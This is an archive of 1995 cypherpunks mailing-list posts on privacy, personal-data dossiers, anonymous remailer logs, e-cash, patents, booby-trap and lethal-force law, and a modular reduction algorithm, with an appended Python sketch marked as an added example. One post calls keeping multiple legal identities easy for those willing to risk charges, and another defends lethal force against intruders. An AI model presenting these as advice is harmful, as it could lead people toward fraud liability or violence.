---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Wed, 6 Sep 95 16:25:19 PDT
To: cypherpunks@toad.com
Subject: cryptography eliminates lawyers?
Message-ID: <199509062335.SAA02364@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: "Cortland D. Starrett" <cort@bioanalytical.com>
>Subject: cryptography eliminates lawyers?

>As a follow-up to the article reference I posted, I pose the
>following question:
>
>Will cryptographic technology and information (communication)
>technology reduce the need for legal services in the future?
>(especially regarding contracts, buying/selling, patent law, etc.)
>Will legal services just look different?  Will they be more
>efficient (cheaper)?
>
>Put bluntly, will cryptography put lawyers out of business?
>Any comments would be appreciated.
>
>Cort.
>
How could crypto put lawyers out of business?  People would still
have disagreements; plans would still go wrong; cars would still
crash.  More important, transactions would still need to be 
structured to carry out the desires of the parties while minimizing
risks.

Good communications technology, including crypto, could make lawyering
more efficient, but I suspect the savings would be minimal.

Communications technology will no more put lawyers out of business
than CASE put programmers out of business.
Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 19:11:12 PDT
To: Mac Norton <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
Message-ID: <ac73a1e41f0210048666@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 AM 9/7/95, Mac Norton wrote:
>Tim and I have corresponded about this previously,
>and again he neglects the distinction between
>collection and storage, on the one hand, and
>retrieval and dissemination, on the other.  If you
>do the latter, your content better be accurate.
>
>That's the difference in Tim and TRW.  So far.:)

I don't really disagree with Mac, at least practically speaking.

(At a much deeper level, much deeper in terms of philosophy, I'm not even
sure _disseminators_ of information have any real necessity to be correct.
This is the issue of truth, reputation, etc. that we discuss so often. But,
I admit that the legal system does not support my anarcho-capitalist
extreme position, which is why I say I don't disagree with Mac,
"practically speaking.")

However, even if I were to start distributing the results of "Tim's
BlackNet Dossier Service," I don't think there's any justification for
people insisting that they have a right to "inspect" my records.

I think the current U.S. law is not too far from my own views. The credit
reporting agencies have an obvious interest in having accurate
information--except for the folks in the Witness program--and will
eventually correct errors. (Not everyone is happy with the speed, but this
is life in a world of finite resources; and I acknowledge that there are
pathological cases of incorrect identity, etc.)

I still favor free market alternatives to top-down government "protection."

And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
throwing out _all_ laws about libel, slander, and false information. After
all, "what is truth?," to coin a phrase.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 6 Sep 95 19:32:32 PDT
To: cypherpunks@toad.com
Subject: University logging mail to anon.penet
Message-ID: <199509070230.TAA24609@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


This just came up locally, and I'd like to have some comments on it, 
especially from people who understand the law a lot better than I do:

Our local University apparently has been logging ALL mail to anon.penet,
including faculty, students, and off-campus users.

They maintain such weak security that someone was able to "obtain"
the logs and post them to a local usenet group, thus compromising
everyone's "anonymous" identities.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 6 Sep 95 18:50:35 PDT
To: cypherpunks@toad.com
Subject: Re: e$ sites of interest
Message-ID: <v01510107ac73fff3792d@[198.59.115.131]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate wrote,
>Found these in PC Week and thought I would pass them along...

For me, new to this, I found NetBank's Netcash(tm) to be the most interesting
even with its little built-in protection from those who spend money twice.
NetBank's URL is this:

     http://www.teleport.com/~netcash/

It is listed with many others in

>Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/
>                                                   mepeirce/project.html
>
>       Overview of trends and techniques, with several useful links for
>       additional information.

Dar
(list newbie)

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 17:52:56 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <ac7271110e021004e592@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950906194301.8489A-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


If the jury isn't persuaded beyond reasonable doubt
that you were in genuine apprehension of serious harm
to yourself or your family--not your property--then
you will be acquitted of using violence to repel an
intruder into your home.  Maybe not your south 40,
but your home.  

Indeed, if the local prosecutor or US Atty believes,
on the positive side, that your actions were reasonable,
you probably won't even be charged.  

Now, that doesn't of itself make deadly force right,
but as I'm just through with cleaning two shotguns
(dove season here, going again Friday), I'm not going 
to argue the point too vigorously.  I'd say the morality 
of such situations, leaving aside the legality, is 
extremely fact-intensive.

Situational ethics?  Excessive subjectivity?  I think
not--I think we can apply objective standards to each
individual case, but it's fatuous to do so in advance.

MacN

On Tue, 5 Sep 1995, Timothy C. May wrote:

> >I don't know what you call it but if nothing else it is ethically and morally
> >reprehensible.
> 
> Different strokes for different folks. Anyone entering my house unannounced
> faces lethal response. I think of it as evolution in action, and doubt I
> would lose any sleep over this.
> 
> It has nothing to do with equating human life over property, it has to do
> with defending one's property and (maybe) one's life. Here in California,
> it is becoming more and more common for "home invasions" to be followed by
> execution of all of the witnesses. (Read "The San Jose Mercury News" for
> accounts of gang invasions in which all the residents in a home are lined
> up and shot, execution-style.)
> 
> I won't get into a discussion of which states permit lethal force
> responses, as this is a topic which even I think belongs in
> talk.politics.guns or similar fora.
> 
> Suffice it to say that most states allow lethal response under threatening
> circumstances.
> 
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 6 Sep 95 16:52:17 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906163311.6403B-100000@on-ramp.ior.com>
Message-ID: <Pine.SUN.3.91.950906194621.9114A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Rob Lowry wrote:

> > Rob, I have entered this posting of yours into the "BlackNet Dossier
> > Service" I operate.
> 
> At least you notified me.. :) Something the TRW crew or others like them 
> do not do.
> 
> 
> > If someone doesn't want their postings going into my 220 megabyte file of
> > postings, they shouldn't send them to me. Or they should adopt a digital
> > pseudonym, unlinkable to their True Name or any other nyms they may have.
> 
> This is true.. I could adopt a nym, such as I use on my BBS, or when I am 
> doing other stuff on the net.. but it is difficult at best to get a new 
> set of credit cards, ID and so on with a new name/alias and still 
> maintain your own name.

In fact it's not difficult.  It's quite simple to establish a new identity
for the individual willing to risk the charges and consequences of 
exposure.  The basic impediment is time.  Good credit doesn't come 
overnight.  The second impediment is tax evasion- which is less than 
justifiable in the United States on the grounds of privacy.  If you're 
willing to be patient, and pay taxes on more than one name, it's easy to
maintain several identities.


> If it were possible to have an alias in real 
> life, as easy as it is to get one on the 'net that is, then I would most 
> certainly do so..

Which tells me how serious you really are about your privacy.  You have 
made a decision here about how much trouble privacy is worth to you, 
which is "not much."

I hear people bitch about privacy endlessly.  Privacy helps those who 
help themselves to privacy.  I think Mr. May was precisely correct in saying 
that it is so much easier and simpler for one to rely on self privacy 
insurance rather than government privacy insurance.

> 'Frothmonger' <g>
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 18:11:26 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Are booby-trapped... [Detailed treatment]
In-Reply-To: <Pine.SUN.3.91.950906014806.24142A-100000@access2.digex.net>
Message-ID: <Pine.SOL.3.91.950906200425.8489D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Thing about the Restatement (any of 'em) is that they
must be read carefully, being especially wary of
circularity.  Note here that the actor would be privileged
only to the extent he would be privileged, get it? under
some other body of law not specifically referenced.

So it all comes back to reasonable apprehension of bodily
harm to yourself or your family (or guests, I suppose), in 
your home or similar place.

MacN

On Wed, 6 Sep 1995, Black Unicorn wrote:
> 
> The basic rule today in most states resembles the restatement position:
> 
> Section 85.  Use of Mechanical Device Threatening Death or Serious 
> Bodily Injury.
> 
> The actor is so far privileged to use such a device intended or likely 
> to cause serious bodily harm or death for the purpose of protecting his 
> land or chattels from intrusion that he is not liable for the serious 
> bodily harm or death thereby caused to an intruder whose intrusion is, 
> in fact, such that the actor, were he present, would be privileged to 
> prevent or terminate it by the intentional infliction of such harm.
> 
[big snip of excellent research]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 6 Sep 95 18:10:56 PDT
To: cypherpunks@toad.com
Subject: e$ sites of interest
Message-ID: <199509070116.UAA00143@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

Found these in PC Week and thought I would pass them along...

CARI - http://www.netresource.com/itp/cari.html

       Collect All Relevant Information, a transaction system that doesn't
       require live transmission of sensitive data.

Cybercash Inc. - http://www.cybercash.com/

       Secure transaction over the internet, using credit and cash payment
       systems.

Digicash - http://www.digicash.com/

       Electronic transaction products include ecash; find the links to
       ecash-centric 'cybershops'.

First Virtual - http://www.fv.com/

       Secure internet-based system that uses the WWW and email for digital
       payment transactions.

Internet Banking - http://sfnb.com/wpaper.html

       White paper on electronic commerce

NetChex - http://www.netchex.com/index.html

       Secure transactions over the internet, using a bank account debit
       system.

Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/
                                                   mepeirce/project.html

       Overview of trends and techniques, with several useful links for
       additional information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 6 Sep 95 20:29:03 PDT
To: cypherpunks@toad.com
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070306.XAA18362@libws4.ic.sunysb.edu>
Message-ID: <199509070326.UAA24732@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> So which university is this?
> 
> > This just came up locally, and I'd like to have some comments on it, 
> > especially from people who understand the law a lot better than I do:
> > 
> > Our local University apparently has been logging ALL mail to anon.penet,
> > including faculty, students, and off-campus users.
> > 
> > They maintain such weak security that someone was able to "obtain"
> > the logs and post them to a local usenet group, thus compromising
> > everyone's "anonymous" identities.
> > 
California State Polytechnic University, San Luis Obispo

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 18:50:03 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906163311.6403B-100000@on-ramp.ior.com>
Message-ID: <Pine.SOL.3.91.950906204509.8489J-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Tim and I have corresponded about this previously,
and again he neglects the distinction between 
collection and storage, on the one hand, and 
retrieval and dissemination, on the other.  If you
do the latter, your content better be accurate.

That's the difference in Tim and TRW.  So far.:)

MacN

On Wed, 6 Sep 1995, Rob Lowry wrote:

> > Rob, I have entered this posting of yours into the "BlackNet Dossier
> > Service" I operate.
> 
> At least you notified me.. :) Something the TRW crew or others like them 
> do not do.
> 
> 
> > If someone doesn't want their postings going into my 220 megabyte file of
> > postings, they shouldn't send them to me. Or they should adopt a digital
> > pseudonym, unlinkable to their True Name or any other nyms they may have.
> 
> This is true.. I could adopt a nym, such as I use on my BBS, or when I am 
> doing other stuff on the net.. but it is difficult at best to get a new 
> set of credit cards, ID and so on with a new name/alias and still 
> maintain your own name. If it were possible to have an alias in real 
> life, as easy as it is to get one on the 'net that is, then I would most 
> certainly do so..
> 
> 'Frothmonger' <g>
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 21:11:15 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906221202.20079C-100000@usis.com>
Message-ID: <Pine.LNX.3.91.950906210405.19265B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Nor was I suggesting a legal solution (I know your comment
> was triggered by Rob's request for legal recourse) but instead
> suggesting that things are farther along than some people realize.

Nor do I support additional rules/laws or regulations.. but if there are 
existing ones to screw with, use 'em..
Recently I had a bill turned over to collections from, of all places, the 
daycare we used to take our kids to.. we owe them about $1300 in their
estimation. The reason we have not paid is due to 11 days of lost work 
due to head lice that they provided to my kids, plus they stopped serving 
breakfast which was in the contract we signed when enrolling the kids there..
I was notified by the collection co. about this submittal (now $1500 for 
some reason..) and by law, I can dispute this in writing, thus slowing 
the wheels of the collection monster horribly. I did so.. and for the 
last 4 months, they have been trying to prove I owe money.. I was asking 
if such a system exists for the release of your credit info.. and it
appears that there is no safety mechanism in that monster.  Rather than 
cry out for more laws to be twisted against us later, I agree that 
letting it happen, and using cash instead of credit, is the smart answer 
here.

Someone care to point me at e-cash info? sounds interesting.. remember, 
I am new to the crypto scene and still think PGP is neato ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 19:52:01 PDT
To: cypherpunks@toad.com
Subject: Collection of persona
In-Reply-To: <8B09393.000504D43B.uuout@the-matrix.com>
Message-ID: <8B094FC.000504D58B.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



RL|Beyond having the willies.. This is more than just scary, it feels like
  |rape when you think about it for awhile. Everything you buy, on credit, is
  |recorded and sold to someone who wants to know your secrets. Every time
  |you make a banking transaction, someone is watching and compiling the
  |data.

        It's not just credit anymore.  If you buy something at Radio
        Shack, even with cash, they want you to give all your info
        voluntarily and they _will_ give you flack if you don't
        cooperate (which can be short-circuited by threatening to cause
        a scene or by suggesting loudly that <competitor> has lower
        prices).

        Anyway, most of what you're wanting to protect aren't secrets,
        at least in the sense of being sensitive material.  It's our
        privacy, our solitude, and our peace of mind that's under
        attack.

RL|Is there any legal recourse to get your name removed from the sellable list?
  |Or is it too late and we can not save even the vestiges of our privacy?

        There's a place in D.C. you can write to that will put a block
        on some lists, but not all (I don't have the address anymore).
        We're screwed.

RL|Oh, but if only I had the 'hacker' skill to break into such a database..
  |I have always been against the destruction of data.. but there are
  |exceptions...

        It wouldn't help and you would be jailed for nothing.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.

 -- SPEED 1.40 [NR]: Evaluation day 133...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 19:20:50 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Collection of personal info
In-Reply-To: <ac73a1e41f0210048666@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950906211454.8489Q-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Timothy C. May wrote:
> I don't really disagree with Mac, at least practically speaking.
> 
> (At a much deeper level, much deeper in terms of philosophy, I'm not even
> sure _disseminators_ of information have any real necessity to be correct.
> This is the issue of truth, reputation, etc. that we discuss so often. But,
> I admit that the legal system does not support my anarcho-capitalist
> extreme position, which is why I say I don't disagree with Mac,
> "practically speaking.")

Well, scratch me deeply enough, I'm not sure I'd disagree 
with Tim, "philosophically speaking."  The problem is, as
all the truly wise philosophers recognized, we must live
in the world.  And given the number of us who must do so,
that entails rules.

With that caveat, none of the below is insufferable to me. 

MacN

> However, even if I were to start distributing the results of "Tim's
> BlackNet Dossier Service," I don't think there's any justification for
> people insisting that they have a right to "inspect" my records.
> 
> I think the current U.S. law is not too far from my own views. The credit
> reporting agencies have an obvious interest in having accurate
> information--except for the folks in the Witness program--and will
> eventually correct errors. (Not everyone is happy with the speed, but this
> is life in a world of finite resources; and I acknowledge that there are
> pathological cases of incorrect identity, etc.)
> 
> I still favor free market alternatives to top-down government "protection."
> 
> And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
> throwing out _all_ laws about libel, slander, and false information. After
> all, "what is truth?," to coin a phrase.
> 
> --Tim May
> 
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 6 Sep 95 19:21:55 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Collection of personal info
In-Reply-To: <ac73a1e41f0210048666@[205.199.118.202]>
Message-ID: <199509070227.VAA00478@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> 
> And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
> throwing out _all_ laws about libel, slander, and false information. After
> all, "what is truth?," to coin a phrase.
> 
> --Tim May
> 

Truth is that which can be verified to be reproducible by independent and
unbiased parties. All else is opinion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 20:59:29 PDT
To: cypherpunks@toad.com
Subject: Collection of persona
In-Reply-To: <8B094A8.000504D4D8.uuout@the-matrix.com>
Message-ID: <8B0951B.000504D5AC.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



BU|In fact it's not difficult.  It's quite simple to establish a new identity
  |for the individual willing to risk the charges and consequences of
  |exposure.  The basic impediment is time.  Good credit doesn't come
  |overnight.  The second impediment is tax evasion- which is less than
  |justifiable in the United States on the grounds of privacy.  If you're
  |willing to be patient, and pay taxes on more than one name, it's easy to
  |maintain several identities.

        A lot of "ifs" there.  Not to mention the expense.

BU|> If it were possible to have an alias in real
  |> life, as easy as it is to get one on the 'net that is, then I would most
  |> certainly do so..
BU|Which tells me how serious you really are about your privacy.  You have
  |made a decision here about how much trouble privacy is worth to you,
  |which is "not much."

        And how many "real names" do you have off the net?

BU|I hear people bitch about privacy endlessly.  Privacy helps those who
  |help themselves to privacy.  I think Mr. May was precisely correct in saying
  |that it is so much easier and simpler for one to rely on self privacy
  |insurance rather than government privacy insurance.

        Certainly.  That doesn't mean that we're all going to jump
        up and maintain several aliases.  Particularly when our
        beloved Uncle Sam is quite capable of deciding that it's
        for fraudulent purposes -- which makes it a felony.

        It would be simpler and easier to start another revolutionary
        war than follow your logic.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.

 -- SPEED 1.40 [NR]: Evaluation day 133...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 6 Sep 95 18:56:28 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Collection of personal info
In-Reply-To: <ac73977f1d0210041506@[205.199.118.202]>
Message-ID: <Pine.PMDF.3.91.950906215435.541116873B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


As it happens I seem to be about to write about this stuff.  Pointers to 
articles/data especially about distributed data sets and how people may 
link them up, would be very welcome...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 6 Sep 95 18:58:17 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: fast modular reduction
In-Reply-To: <Pine.SUN.3.91.950906174500.9460B-100000@eskimo.com>
Message-ID: <199509070157.VAA16973@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In the following pseudocode, B is the radix in which the numbers are 
> represented (2^32 for a 32-bit machine), n is the length of modulus in 
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
> is the length of X, and Y is the result.
> 
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3.	Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4.	If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)

  Is there a proof of correctness available for this algorithm? It
looks almost like a Radix-B peasant division algorithm with some
modifications. Is there an algorithmic analysis available? I also
think there is a bug in your description. Let k+1 = n+1
(e.g. the dividend is 1 more "block" than the modulus). Then
i=n starting out, and we have

3. Y=Y - Y[n] * B^n + Y[n] * U * B^(n-n-1)  [we have B^-1] I'm assuming
this was unintended.


How does this algorithm compare to computing the reciprocal
via Newton's Formula, and then multiplying by the reciprocal
using Karatsuba multiplication? While I was at IBM Watson I invented
a modular reduction algorithm that saves 1/4 the number of 
multiplications required on average once you have the reciprocal 
computed.


-Ray
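
An added example, not code from either poster: a Python sketch of the four quoted steps that checks, on every pass, that the result stays congruent to X and that the exponent i-n-1 is non-negative for the loop range as written (i from k down to n+1). The function names, the `bits` parameter, the constructed test moduli and the final `%` in `reduce_full` are assumptions of this sketch.

```python
import random


def block_len(x, bits):
    """Number of radix-2**bits blocks needed to hold x (at least one)."""
    return max(1, (x.bit_length() + bits - 1) // bits)


def partial_reduce(x, m, bits=32):
    """Apply steps 1-4 of the quoted pseudocode to X = x with modulus m.

    Returns Y congruent to x mod m with Y < B**(n+1). Y may still be >= m.
    """
    if m <= 0 or x < 0:
        raise ValueError("need m > 0 and x >= 0")
    B = 1 << bits                      # radix
    n = block_len(m, bits)             # length of the modulus in blocks
    U = pow(B, n + 1, m)               # U = B^(n+1) mod m
    k = block_len(x, bits) - 1         # X occupies blocks 0..k
    Y = x                              # step 1
    for i in range(k, n, -1):          # step 2: i = k, k-1, ..., n+1
        shift = i - n - 1              # exponent of B used in steps 3 and 4
        assert shift >= 0              # i >= n+1, so B^(i-n-1) is an integer
        Yi = (Y >> (bits * i)) & (B - 1)
        # Step 3: B^i is congruent to U * B^(i-n-1) mod m, so trade one
        # for the other; this clears block i without changing Y mod m.
        Y = Y - Yi * B**i + Yi * U * B**shift
        # Step 4: the addition above can carry into block i at most once.
        if Y >= B**i:
            Y = Y - B**i + U * B**shift
        assert Y < B**i                # block i and everything above is zero
    return Y


def reduce_full(x, m, bits=32):
    """Canonical residue in [0, m).

    Assumption of this example: the short (n+1)-block value left by the
    quoted steps is finished with an ordinary % operation.
    """
    return partial_reduce(x, m, bits) % m


def self_check(trials=2000, seed=1995, bits=32):
    """Compare against Python's own % on constructed random inputs."""
    rng = random.Random(seed)
    B = 1 << bits
    for _ in range(trials):
        m = rng.getrandbits(bits * rng.randint(1, 8)) | 1   # constructed modulus
        x = rng.getrandbits(bits * rng.randint(1, 20))      # constructed operand
        n = block_len(m, bits)
        y = partial_reduce(x, m, bits)
        if y % m != x % m or y >= B ** (n + 1):
            return False
    return True


if __name__ == "__main__":
    # Hand-checkable case with 4-bit blocks: B = 16, m = 0xB7 (n = 2), U = 70.
    print(partial_reduce(0xABCDE, 0xB7, bits=4))
    print(reduce_full(0xABCDE, 0xB7, bits=4))
    print(self_check())
```

The branch in step 4 depends on the value being reduced, so a bignum routine handling secret operands would need a constant-time form of that correction; this sketch does not attempt one.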


 
 

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Wed, 6 Sep 95 20:01:08 PDT
To: cypherpunks@toad.com
Subject: University logging mail to anon.penet (fwd)
Message-ID: <m0sqXCA-0005FXC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From toad.com!owner-cypherpunks Wed Sep  6 21:43:41 1995
> From: Jeff Simmons <jsimmons@goblin.punk.net>
> Subject: University logging mail to anon.penet
> 
> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.
> 

punk.net is in San Luis Obispo. Since Skypoint carries a lot of 
regional groups, I can follow the issue on Usenet, in these
groups:

slo.unix,slo.general,slo.punks,alt.comp.acad-freedom.talk,comp.org.eff.talk

Those of you who don't get the slo.* groups, you can probably see
the original posts in comp.org.eff.talk or alt.comp.acad-freedom.

The subject is "No subject".

(I still chuckle when I see the group slo.sex ...)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 6 Sep 95 19:05:44 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: fast modular reduction
In-Reply-To: <v02120d11ac7406fa32d1@[199.2.22.120]>
Message-ID: <199509070205.WAA18771@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I was very distressed when Josh gave this presentation; apparently
> patents have been filed, etc., and someone from another company
> in Europe was claiming they'd _already_ patented it.
> 
> What is the story here? From my pov, the performance increase doesn't
> justify the ramifications of dealing with yet another potentially
> surly patent holder (either Microsoft in your case, or whoever the
> irate European fellow was who claims to have already patented it.)

  I wish the damn patent offices of the world would get a clue. It used
to be when someone found a quicker algorithm, it was published in
a journal and sooner or later showed up in Knuth AoCP version x.y. Now,
every single algorithm gets patented. At the rate it's going now,
"ComponentWare" of the future will mean the number of patent components
you managed to license simultaneously. The worst patent being
considered by the Patent Office right now is the dreaded Eolas patent
which purports to have invented the concept of "embedded applications"
in Web documents (e.g. Grail, Java, Safe-Tcl) and interprocess
communication between web browsers and helper applications
(e.g. NS-API/NC-API)

  The whole patent system needs to be abolished.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Wed, 6 Sep 95 13:29:12 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <m0sqR1Y-000Pa2C@bofh.lake.de>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      This is the second or third time I've seen descriptions of such
>      raids where cult (no, I'm not trying to be diplomatic)
>      representatives were present and participating.  Is this legal in
>      Amsterdam?  How about in the U.S.?  Britain?
> 
Probably. Amsterdam isn't exactly the wild west, and they didn't take the
computer equipment with them, they just inventoried everything so to have
something to sell when their claims prove valid. Which I doubt (shit, I
will be moving to this country in a couple of weeks...)

>      If a police officer has a warrant then I really don't have much
>      choice about letting him in.  Am I also under an obligation to
>      allow the people who filed for the warrant into my home or
>      business?
> 
I don't know whether this is valid. I assume so. I also think it is about
time we develop some ideas about anonymous web publishing. Probably some
chained cgi scripts could do, but how to get around traffic analysis?

-- 
Cees de Groot, OpenLink Software		         <cg@bofh.lake.de>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
http://www.lake.de/sonst/homepages/s2449/index.html



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 6 Sep 95 20:35:35 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Collection of personal info
In-Reply-To: <ac737a2b1b0210043115@[205.199.118.202]>
Message-ID: <Pine.BSI.3.91.950906221202.20079C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Timothy C. May wrote:

> At 10:15 PM 9/6/95, Rob Lowry wrote:
> 
> >Beyond having the willies.. This is more than just scary, it feels like
